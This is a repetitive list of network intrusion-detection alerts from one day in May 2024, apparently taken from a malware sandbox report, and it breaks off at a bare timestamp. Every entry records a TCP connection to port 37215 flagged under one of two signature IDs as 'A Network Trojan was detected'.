            Timestamp:05/28/24-09:57:13.790082
            SID:2829579
            Source Port:46620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020717
            SID:2835222
            Source Port:40092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881980
            SID:2835222
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804744
            SID:2835222
            Source Port:34344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.950248
            SID:2829579
            Source Port:52594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.467250
            SID:2829579
            Source Port:46534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048732
            SID:2835222
            Source Port:42156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.076223
            SID:2829579
            Source Port:55346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911974
            SID:2829579
            Source Port:60348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377209
            SID:2835222
            Source Port:58078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862746
            SID:2829579
            Source Port:42798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764918
            SID:2829579
            Source Port:54118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701898
            SID:2835222
            Source Port:43306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643860
            SID:2835222
            Source Port:42438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058329
            SID:2829579
            Source Port:38542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.306140
            SID:2835222
            Source Port:35852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038963
            SID:2835222
            Source Port:55282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.169893
            SID:2829579
            Source Port:34956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434414
            SID:2829579
            Source Port:58656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777789
            SID:2835222
            Source Port:53378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834016
            SID:2829579
            Source Port:60936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278214
            SID:2835222
            Source Port:44294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276150
            SID:2829579
            Source Port:48872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862811
            SID:2829579
            Source Port:36450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679639
            SID:2829579
            Source Port:46532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753448
            SID:2829579
            Source Port:43376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935199
            SID:2835222
            Source Port:46196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476073
            SID:2829579
            Source Port:33190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059656
            SID:2829579
            Source Port:48574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.206564
            SID:2829579
            Source Port:54682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380354
            SID:2829579
            Source Port:37156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773516
            SID:2829579
            Source Port:49060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927289
            SID:2835222
            Source Port:33096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300210
            SID:2835222
            Source Port:35388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047946
            SID:2829579
            Source Port:45580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433207
            SID:2835222
            Source Port:47600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605026
            SID:2829579
            Source Port:60176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.358486
            SID:2835222
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553722
            SID:2835222
            Source Port:44242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808992
            SID:2829579
            Source Port:45208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575323
            SID:2835222
            Source Port:33328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812171
            SID:2835222
            Source Port:33998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617891
            SID:2829579
            Source Port:45918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849634
            SID:2835222
            Source Port:47124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824238
            SID:2835222
            Source Port:39016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934181
            SID:2829579
            Source Port:43368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.655752
            SID:2829579
            Source Port:45240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858574
            SID:2829579
            Source Port:51856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862220
            SID:2835222
            Source Port:34798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956239
            SID:2835222
            Source Port:57984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736999
            SID:2829579
            Source Port:36014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836551
            SID:2835222
            Source Port:49176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825440
            SID:2835222
            Source Port:58306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733694
            SID:2835222
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519617
            SID:2835222
            Source Port:60540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.281084
            SID:2829579
            Source Port:35920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772528
            SID:2835222
            Source Port:60790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899121
            SID:2829579
            Source Port:35516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737183
            SID:2835222
            Source Port:54446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326561
            SID:2835222
            Source Port:39818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920178
            SID:2835222
            Source Port:56182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863564
            SID:2835222
            Source Port:45020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903126
            SID:2835222
            Source Port:34540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754765
            SID:2829579
            Source Port:56208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.734433
            SID:2829579
            Source Port:33750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.766979
            SID:2835222
            Source Port:56082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339988
            SID:2829579
            Source Port:60708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.756862
            SID:2829579
            Source Port:54884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565142
            SID:2829579
            Source Port:41884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605512
            SID:2829579
            Source Port:38838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774502
            SID:2829579
            Source Port:41954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330981
            SID:2835222
            Source Port:38442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543266
            SID:2829579
            Source Port:57626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917822
            SID:2835222
            Source Port:41954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546001
            SID:2835222
            Source Port:39404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810998
            SID:2835222
            Source Port:59216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352135
            SID:2835222
            Source Port:39928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864657
            SID:2835222
            Source Port:46178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298475
            SID:2835222
            Source Port:34026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544334
            SID:2829579
            Source Port:41906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.582094
            SID:2835222
            Source Port:45274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846656
            SID:2829579
            Source Port:41908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915246
            SID:2829579
            Source Port:53140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507783
            SID:2829579
            Source Port:42156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767194
            SID:2835222
            Source Port:33986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557998
            SID:2835222
            Source Port:52510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575300
            SID:2829579
            Source Port:39372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926827
            SID:2829579
            Source Port:57908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057773
            SID:2835222
            Source Port:59018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911259
            SID:2829579
            Source Port:42682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988954
            SID:2829579
            Source Port:37952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962551
            SID:2835222
            Source Port:56848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779005
            SID:2835222
            Source Port:41448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849587
            SID:2829579
            Source Port:60376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617893
            SID:2835222
            Source Port:52956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755925
            SID:2829579
            Source Port:47636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046834
            SID:2835222
            Source Port:40822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.978978
            SID:2835222
            Source Port:43814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697558
            SID:2835222
            Source Port:35662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744338
            SID:2835222
            Source Port:39902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927674
            SID:2829579
            Source Port:43054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809352
            SID:2829579
            Source Port:41928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905136
            SID:2829579
            Source Port:39236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.392701
            SID:2835222
            Source Port:35352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.964824
            SID:2829579
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000413
            SID:2835222
            Source Port:34798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.618272
            SID:2835222
            Source Port:52648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730177
            SID:2829579
            Source Port:45810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868363
            SID:2835222
            Source Port:44866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339848
            SID:2829579
            Source Port:58414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.332844
            SID:2829579
            Source Port:38456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961288
            SID:2835222
            Source Port:45046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.170140
            SID:2835222
            Source Port:56962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854611
            SID:2835222
            Source Port:48694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434194
            SID:2829579
            Source Port:57330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875599
            SID:2835222
            Source Port:42920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954153
            SID:2835222
            Source Port:39228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261988
            SID:2829579
            Source Port:48036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807723
            SID:2829579
            Source Port:54868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.077931
            SID:2829579
            Source Port:57356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442361
            SID:2829579
            Source Port:51324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748356
            SID:2835222
            Source Port:44098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507010
            SID:2829579
            Source Port:51072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771281
            SID:2829579
            Source Port:58628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709552
            SID:2835222
            Source Port:45380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777770
            SID:2835222
            Source Port:40100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856724
            SID:2835222
            Source Port:46904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809616
            SID:2829579
            Source Port:54388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376743
            SID:2835222
            Source Port:60202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030716
            SID:2835222
            Source Port:35690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180652
            SID:2835222
            Source Port:60492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955720
            SID:2829579
            Source Port:53052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691821
            SID:2835222
            Source Port:49878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541874
            SID:2835222
            Source Port:42010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948674
            SID:2835222
            Source Port:50026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935181
            SID:2829579
            Source Port:35352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423103
            SID:2829579
            Source Port:60270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962894
            SID:2835222
            Source Port:50136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000896
            SID:2829579
            Source Port:37502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058472
            SID:2835222
            Source Port:46860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020332
            SID:2829579
            Source Port:51640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059770
            SID:2835222
            Source Port:41262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761615
            SID:2829579
            Source Port:51126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.951672
            SID:2835222
            Source Port:40902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562231
            SID:2835222
            Source Port:52490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347654
            SID:2829579
            Source Port:39090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887732
            SID:2835222
            Source Port:40356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994022
            SID:2835222
            Source Port:54826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064071
            SID:2835222
            Source Port:55374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299415
            SID:2835222
            Source Port:49734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445052
            SID:2835222
            Source Port:58432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.996281
            SID:2829579
            Source Port:48754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436643
            SID:2835222
            Source Port:58926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623305
            SID:2829579
            Source Port:33528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926901
            SID:2835222
            Source Port:38826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.862142
            SID:2835222
            Source Port:50230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052452
            SID:2835222
            Source Port:46566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855628
            SID:2829579
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058520
            SID:2835222
            Source Port:34570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766476
            SID:2835222
            Source Port:34170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443194
            SID:2829579
            Source Port:59988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744945
            SID:2835222
            Source Port:58034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929968
            SID:2835222
            Source Port:37574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811902
            SID:2829579
            Source Port:51624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.589866
            SID:2829579
            Source Port:56398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349149
            SID:2829579
            Source Port:50206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.870861
            SID:2835222
            Source Port:60612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880586
            SID:2829579
            Source Port:37244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922782
            SID:2835222
            Source Port:55676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850240
            SID:2829579
            Source Port:51652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620560
            SID:2829579
            Source Port:44164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651179
            SID:2835222
            Source Port:37234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304190
            SID:2835222
            Source Port:35208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469532
            SID:2829579
            Source Port:59404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396521
            SID:2835222
            Source Port:54820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046926
            SID:2835222
            Source Port:46282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745972
            SID:2829579
            Source Port:36616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068235
            SID:2835222
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066047
            SID:2835222
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776848
            SID:2829579
            Source Port:36138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737650
            SID:2829579
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303782
            SID:2835222
            Source Port:41886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394502
            SID:2835222
            Source Port:48622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.356982
            SID:2829579
            Source Port:60130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.023537
            SID:2829579
            Source Port:56546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966692
            SID:2835222
            Source Port:42576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376873
            SID:2835222
            Source Port:60024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930797
            SID:2829579
            Source Port:45026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333162
            SID:2835222
            Source Port:52190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068461
            SID:2829579
            Source Port:37104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335322
            SID:2835222
            Source Port:51916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878610
            SID:2835222
            Source Port:38032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828279
            SID:2829579
            Source Port:47270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944835
            SID:2829579
            Source Port:40006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003970
            SID:2835222
            Source Port:44250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507448
            SID:2829579
            Source Port:41850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.494024
            SID:2829579
            Source Port:47556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707748
